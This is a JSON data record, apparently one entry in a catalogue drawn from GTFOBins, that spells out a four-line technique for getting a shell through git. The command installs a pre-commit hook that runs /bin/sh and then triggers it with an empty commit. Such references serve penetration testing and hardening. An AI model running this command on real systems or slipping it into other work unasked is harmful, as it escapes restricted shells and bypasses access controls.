{
  "id": "gtfo-git-shell-2",
  "name": "GTFOBins · git (shell) #2",
  "command": "git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x",
  "description": "Use git to shell via GTFOBins.",
  "platform": "linux",
  "tags": [
    "gtfobins",
    "git",
    "shell"
  ],
  "source": "gtfobins",
  "source_url": "https://gtfobins.github.io/gtfobins/git/#shell",
  "upstream_id": "git/shell/1",
  "category": "gtfobins",
  "subcategory": "shell",
  "references": [
    {
      "title": "GTFOBins",
      "url": "https://gtfobins.github.io/gtfobins/git/"
    }
  ]
}
